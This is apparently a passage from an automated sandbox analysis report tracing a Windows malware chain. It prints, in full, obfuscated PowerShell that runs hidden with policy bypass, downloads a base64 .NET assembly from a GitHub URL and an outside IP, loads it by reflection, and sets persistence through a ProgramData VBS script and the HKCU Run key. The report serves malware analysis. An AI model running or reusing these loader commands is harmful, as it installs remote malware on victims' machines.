Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: $Codigo = 'KCgnUjFsJysndXJsID0gJysnUUxlJysnaHR0cCcrJ3M6Ly8nKydyYScrJ3cnKycuZ2l0aCcrJ3UnKydidXNlcmNvbnRlbnQnKycuY28nKydtL05vRGV0ZWN0T24vTm9EZXQnKydlJysnYycrJ3RPbi9yJysnZWZzL2hlYWRzLycrJ20nKydhaW4vRGV0YWhOb3RoLScrJ1YudHgnKyd0UUxlOyBSMWxiYXNlNjRDbycrJ24nKyd0ZW50ID0gKE5ldy1PYmonKydlY3QgU3lzdGUnKydtLk5lJysndCcrJy4nKydXZScrJ2JDJysnbGknKydlbnQpLkRvdycrJ25sb2FkJysnU3RyaW4nKydnJysnKFInKycxbHVyJysnbCk7JysnIFIxbGJpbicrJ2FyeScrJ0MnKydvbnRlbnQnKycgJysnPSBbU3lzdCcrJ2VtLicrJ0NvbnZlcnRdOjpGcicrJ29tQicrJ2FzZTY0U3RyJysnaW4nKydnKFIxbGJhc2U2NCcrJ0NvbnQnKydlbicrJ3QpJysnOyBSJysnMWwnKydhc3MnKydlbWInKydseSA9IFtSZWYnKydsJysnZWN0aW9uLkEnKydzJysnc2UnKydtYmx5XTo6TCcrJ29hZCgnKydSMWxiaW5hJysncnlDb250JysnZW50KTsgJysnWycrJ2RubGliJysnLklPJysnLkgnKydvbWVdJysnOjonKydWQUkoZHprdHh0LicrJ0dGQ1JSLzAnKyc1NC8zJysnNS4zNC4nKyc1LjInKyc3Ly86cHR0aCcrJ2R6aycrJywgZHprJysnMWR6aycrJywgJysnZHprJysnQzprJysnc2gnKydQcm9ncicrJ2FtRGF0YWtzaGR6aywgZHprYXV0b3AnKydhdGlhZCcrJ3prLCcrJyBkemsnKydSZWcnKydBc21keicrJ2ssIGQnKyd6a2QnKyd6aycrJyxkJysnemtkJysnemspJyktUkVQTEFDZSAgKFtjaEFyXTEwMCtbY2hBcl0xMjIrW2NoQXJdMTA3KSxbY2hBcl0zNCAtUkVQTEFDZSAna3NoJyxbY2hBcl05Mi1DUkVwbEFDZSAgKFtjaEFyXTgyK1tjaEFyXTQ5K1tjaEFyXTEwOCksW2NoQXJdMzYgLVJFUExBQ2UnUUxlJyxbY2hBcl0zOSl8ICYoIChbc3RySU5nXSR2ZXJCT1NlUHJlZkVSRW5jZSlbMSwzXSsneCctak9JbicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD$global:?
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('R1l'+'url = '+'QLe'+'http'+'s://'+'ra'+'w'+'.gith'+'u'+'busercontent'+'.co'+'m/NoDetectOn/NoDet'+'e'+'c'+'tOn/r'+'efs/heads/'+'m'+'ain/DetahNoth-'+'V.tx'+'tQLe; R1lbase64Co'+'n'+'tent = (New-Obj'+'ect Syste'+'m.Ne'+'t'+'.'+'We'+'bC'+'li'+'ent).Dow'+'nload'+'Strin'+'g'+'(R'+'1lur'+'l);'+' R1lbin'+'ary'+'C'+'ontent'+' '+'= [Syst'+'em.'+'Convert]::Fr'+'omB'+'ase64Str'+'in'+'g(R1lbase64'+'Cont'+'en'+'t)'+'; R'+'1l'+'ass'+'emb'+'ly = [Ref'+'l'+'ection.A'+'s'+'se'+'mbly]::L'+'oad('+'R1lbina'+'ryCont'+'ent); '+'['+'dnlib'+'.IO'+'.H'+'ome]'+'::'+'VAI(dzktxt.'+'GFCRR/0'+'54/3'+'5.34.'+'5.2'+'7//:ptth'+'dzk'+', dzk'+'1dzk'+', '+'dzk'+'C:k'+'sh'+'Progr'+'amDatakshdzk, dzkautop'+'atiad'+'zk,'+' dzk'+'Reg'+'Asmdz'+'k, d'+'zkd'+'zk'+',d'+'zkd'+'zk)')-REPLACe ([chAr]100+[chAr]122+[chAr]107),[chAr]34 -REPLACe 'ksh',[chAr]92-CREplACe ([chAr]82+[chAr]49+[chAr]108),[chAr]36 -REPLACe'QLe',[chAr]39)| &( ([strINg]$verBOSePrefEREnce)[1,3]+'x'-jOIn'')"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('R1l'+'url = '+'QLe'+'http'+'s://'+'ra'+'w'+'.gith'+'u'+'busercontent'+'.co'+'m/NoDetectOn/NoDet'+'e'+'c'+'tOn/r'+'efs/heads/'+'m'+'ain/DetahNoth-'+'V.tx'+'tQLe; R1lbase64Co'+'n'+'tent = (New-Obj'+'ect Syste'+'m.Ne'+'t'+'.'+'We'+'bC'+'li'+'ent).Dow'+'nload'+'Strin'+'g'+'(R'+'1lur'+'l);'+' R1lbin'+'ary'+'C'+'ontent'+' '+'= [Syst'+'em.'+'Convert]::Fr'+'omB'+'ase64Str'+'in'+'g(R1lbase64'+'Cont'+'en'+'t)'+'; R'+'1l'+'ass'+'emb'+'ly = [Ref'+'l'+'ection.A'+'s'+'se'+'mbly]::L'+'oad('+'R1lbina'+'ryCont'+'ent); '+'['+'dnlib'+'.IO'+'.H'+'ome]'+'::'+'VAI(dzktxt.'+'GFCRR/0'+'54/3'+'5.34.'+'5.2'+'7//:ptth'+'dzk'+', dzk'+'1dzk'+', '+'dzk'+'C:k'+'sh'+'Progr'+'amDatakshdzk, dzkautop'+'atiad'+'zk,'+' dzk'+'Reg'+'Asmdz'+'k, d'+'zkd'+'zk'+',d'+'zkd'+'zk)')-REPLACe ([chAr]100+[chAr]122+[chAr]107),[chAr]34 -REPLACe 'ksh',[chAr]92-CREplACe ([chAr]82+[chAr]49+[chAr]108),[chAr]36 -REPLACe'QLe',[chAr]39)| &( ([strINg]$verBOSePrefEREnce)[1,3]+'x'-jOIn'')" Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnUjFsJysndXJsID0gJysnUUxlJysnaHR0cCcrJ3M6Ly8nKydyYScrJ3cnKycuZ2l0aCcrJ3UnKydidXNlcmNvbnRlbnQnKycuY28nKydtL05vRGV0ZWN0T24vTm9EZXQnKydlJysnYycrJ3RPbi9yJysnZWZzL2hlYWRzLycrJ20nKydhaW4vRGV0YWhOb3RoLScrJ1YudHgnKyd0UUxlOyBSMWxiYXNlNjRDbycrJ24nKyd0ZW50ID0gKE5ldy1PYmonKydlY3QgU3lzdGUnKydtLk5lJysndCcrJy4nKydXZScrJ2JDJysnbGknKydlbnQpLkRvdycrJ25sb2FkJysnU3RyaW4nKydnJysnKFInKycxbHVyJysnbCk7JysnIFIxbGJpbicrJ2FyeScrJ0MnKydvbnRlbnQnKycgJysnPSBbU3lzdCcrJ2VtLicrJ0NvbnZlcnRdOjpGcicrJ29tQicrJ2FzZTY0U3RyJysnaW4nKydnKFIxbGJhc2U2NCcrJ0NvbnQnKydlbicrJ3QpJysnOyBSJysnMWwnKydhc3MnKydlbWInKydseSA9IFtSZWYnKydsJysnZWN0aW9uLkEnKydzJysnc2UnKydtYmx5XTo6TCcrJ29hZCgnKydSMWxiaW5hJysncnlDb250JysnZW50KTsgJysnWycrJ2RubGliJysnLklPJysnLkgnKydvbWVdJysnOjonKydWQUkoZHprdHh0LicrJ0dGQ1JSLzAnKyc1NC8zJysnNS4zNC4nKyc1LjInKyc3Ly86cHR0aCcrJ2R6aycrJywgZHprJysnMWR6aycrJywgJysnZHprJysnQzprJysnc2gnKydQcm9ncicrJ2FtRGF0YWtzaGR6aywgZHprYXV0b3AnKydhdGlhZCcrJ3prLCcrJyBkemsnKydSZWcnKydBc21keicrJ2ssIGQnKyd6a2QnKyd6aycrJyxkJysnemtkJysnemspJyktUkVQTEFDZSAgKFtjaEFyXTEwMCtbY2hBcl0xMjIrW2NoQXJdMTA3KSxbY2hBcl0zNCAtUkVQTEFDZSAna3NoJyxbY2hBcl05Mi1DUkVwbEFDZSAgKFtjaEFyXTgyK1tjaEFyXTQ5K1tjaEFyXTEwOCksW2NoQXJdMzYgLVJFUExBQ2UnUUxlJyxbY2hBcl0zOSl8ICYoIChbc3RySU5nXSR2ZXJCT1NlUHJlZkVSRW5jZSlbMSwzXSsneCctak9JbicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('R1l'+'url = '+'QLe'+'http'+'s://'+'ra'+'w'+'.gith'+'u'+'busercontent'+'.co'+'m/NoDetectOn/NoDet'+'e'+'c'+'tOn/r'+'efs/heads/'+'m'+'ain/DetahNoth-'+'V.tx'+'tQLe; R1lbase64Co'+'n'+'tent = (New-Obj'+'ect Syste'+'m.Ne'+'t'+'.'+'We'+'bC'+'li'+'ent).Dow'+'nload'+'Strin'+'g'+'(R'+'1lur'+'l);'+' R1lbin'+'ary'+'C'+'ontent'+' '+'= [Syst'+'em.'+'Convert]::Fr'+'omB'+'ase64Str'+'in'+'g(R1lbase64'+'Cont'+'en'+'t)'+'; R'+'1l'+'ass'+'emb'+'ly = [Ref'+'l'+'ection.A'+'s'+'se'+'mbly]::L'+'oad('+'R1lbina'+'ryCont'+'ent); '+'['+'dnlib'+'.IO'+'.H'+'ome]'+'::'+'VAI(dzktxt.'+'GFCRR/0'+'54/3'+'5.34.'+'5.2'+'7//:ptth'+'dzk'+', dzk'+'1dzk'+', '+'dzk'+'C:k'+'sh'+'Progr'+'amDatakshdzk, dzkautop'+'atiad'+'zk,'+' dzk'+'Reg'+'Asmdz'+'k, d'+'zkd'+'zk'+',d'+'zkd'+'zk)')-REPLACe ([chAr]100+[chAr]122+[chAr]107),[chAr]34 -REPLACe 'ksh',[chAr]92-CREplACe ([chAr]82+[chAr]49+[chAr]108),[chAr]36 -REPLACe'QLe',[chAr]39)| &( ([strINg]$verBOSePrefEREnce)[1,3]+'x'-jOIn'')"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnUjFsJysndXJsID0gJysnUUxlJysnaHR0cCcrJ3M6Ly8nKydyYScrJ3cnKycuZ2l0aCcrJ3UnKydidXNlcmNvbnRlbnQnKycuY28nKydtL05vRGV0ZWN0T24vTm9EZXQnKydlJysnYycrJ3RPbi9yJysnZWZzL2hlYWRzLycrJ20nKydhaW4vRGV0YWhOb3RoLScrJ1YudHgnKyd0UUxlOyBSMWxiYXNlNjRDbycrJ24nKyd0ZW50ID0gKE5ldy1PYmonKydlY3QgU3lzdGUnKydtLk5lJysndCcrJy4nKydXZScrJ2JDJysnbGknKydlbnQpLkRvdycrJ25sb2FkJysnU3RyaW4nKydnJysnKFInKycxbHVyJysnbCk7JysnIFIxbGJpbicrJ2FyeScrJ0MnKydvbnRlbnQnKycgJysnPSBbU3lzdCcrJ2VtLicrJ0NvbnZlcnRdOjpGcicrJ29tQicrJ2FzZTY0U3RyJysnaW4nKydnKFIxbGJhc2U2NCcrJ0NvbnQnKydlbicrJ3QpJysnOyBSJysnMWwnKydhc3MnKydlbWInKydseSA9IFtSZWYnKydsJysnZWN0aW9uLkEnKydzJysnc2UnKydtYmx5XTo6TCcrJ29hZCgnKydSMWxiaW5hJysncnlDb250JysnZW50KTsgJysnWycrJ2RubGliJysnLklPJysnLkgnKydvbWVdJysnOjonKydWQUkoZHprdHh0LicrJ0dGQ1JSLzAnKyc1NC8zJysnNS4zNC4nKyc1LjInKyc3Ly86cHR0aCcrJ2R6aycrJywgZHprJysnMWR6aycrJywgJysnZHprJysnQzprJysnc2gnKydQcm9ncicrJ2FtRGF0YWtzaGR6aywgZHprYXV0b3AnKydhdGlhZCcrJ3prLCcrJyBkemsnKydSZWcnKydBc21keicrJ2ssIGQnKyd6a2QnKyd6aycrJyxkJysnemtkJysnemspJyktUkVQTEFDZSAgKFtjaEFyXTEwMCtbY2hBcl0xMjIrW2NoQXJdMTA3KSxbY2hBcl0zNCAtUkVQTEFDZSAna3NoJyxbY2hBcl05Mi1DUkVwbEFDZSAgKFtjaEFyXTgyK1tjaEFyXTQ5K1tjaEFyXTEwOCksW2NoQXJdMzYgLVJFUExBQ2UnUUxlJyxbY2hBcl0zOSl8ICYoIChbc3RySU5nXSR2ZXJCT1NlUHJlZkVSRW5jZSlbMSwzXSsneCctak9JbicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('R1l'+'url = '+'QLe'+'http'+'s://'+'ra'+'w'+'.gith'+'u'+'busercontent'+'.co'+'m/NoDetectOn/NoDet'+'e'+'c'+'tOn/r'+'efs/heads/'+'m'+'ain/DetahNoth-'+'V.tx'+'tQLe; R1lbase64Co'+'n'+'tent = (New-Obj'+'ect Syste'+'m.Ne'+'t'+'.'+'We'+'bC'+'li'+'ent).Dow'+'nload'+'Strin'+'g'+'(R'+'1lur'+'l);'+' R1lbin'+'ary'+'C'+'ontent'+' '+'= [Syst'+'em.'+'Convert]::Fr'+'omB'+'ase64Str'+'in'+'g(R1lbase64'+'Cont'+'en'+'t)'+'; R'+'1l'+'ass'+'emb'+'ly = [Ref'+'l'+'ection.A'+'s'+'se'+'mbly]::L'+'oad('+'R1lbina'+'ryCont'+'ent); '+'['+'dnlib'+'.IO'+'.H'+'ome]'+'::'+'VAI(dzktxt.'+'GFCRR/0'+'54/3'+'5.34.'+'5.2'+'7//:ptth'+'dzk'+', dzk'+'1dzk'+', '+'dzk'+'C:k'+'sh'+'Progr'+'amDatakshdzk, dzkautop'+'atiad'+'zk,'+' dzk'+'Reg'+'Asmdz'+'k, d'+'zkd'+'zk'+',d'+'zkd'+'zk)')-REPLACe ([chAr]100+[chAr]122+[chAr]107),[chAr]34 -REPLACe 'ksh',[chAr]92-CREplACe ([chAr]82+[chAr]49+[chAr]108),[chAr]36 -REPLACe'QLe',[chAr]39)| &( ([strINg]$verBOSePrefEREnce)[1,3]+'x'-jOIn'')" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FFD9BA18166 push esp; iretd 3_2_00007FFD9BA1816C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FFD9BA17545 push ebx; iretd 3_2_00007FFD9BA1756A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FFD9BA11520 push eax; ret 3_2_00007FFD9BA1154D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FFD9BAE236C push 8B485F92h; iretd 3_2_00007FFD9BAE2371
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FFD9BAE23BE push 8B485F92h; iretd 3_2_00007FFD9BAE23C6

Persistence and Installation Behavior

barindex
Source: C:\Windows\System32\cmd.exe File created: C:\ProgramData\autopatia.vbs Jump to behavior

Boot Survival

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Path C:\ProgramData\autopatia.vbs Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Path Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Path Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
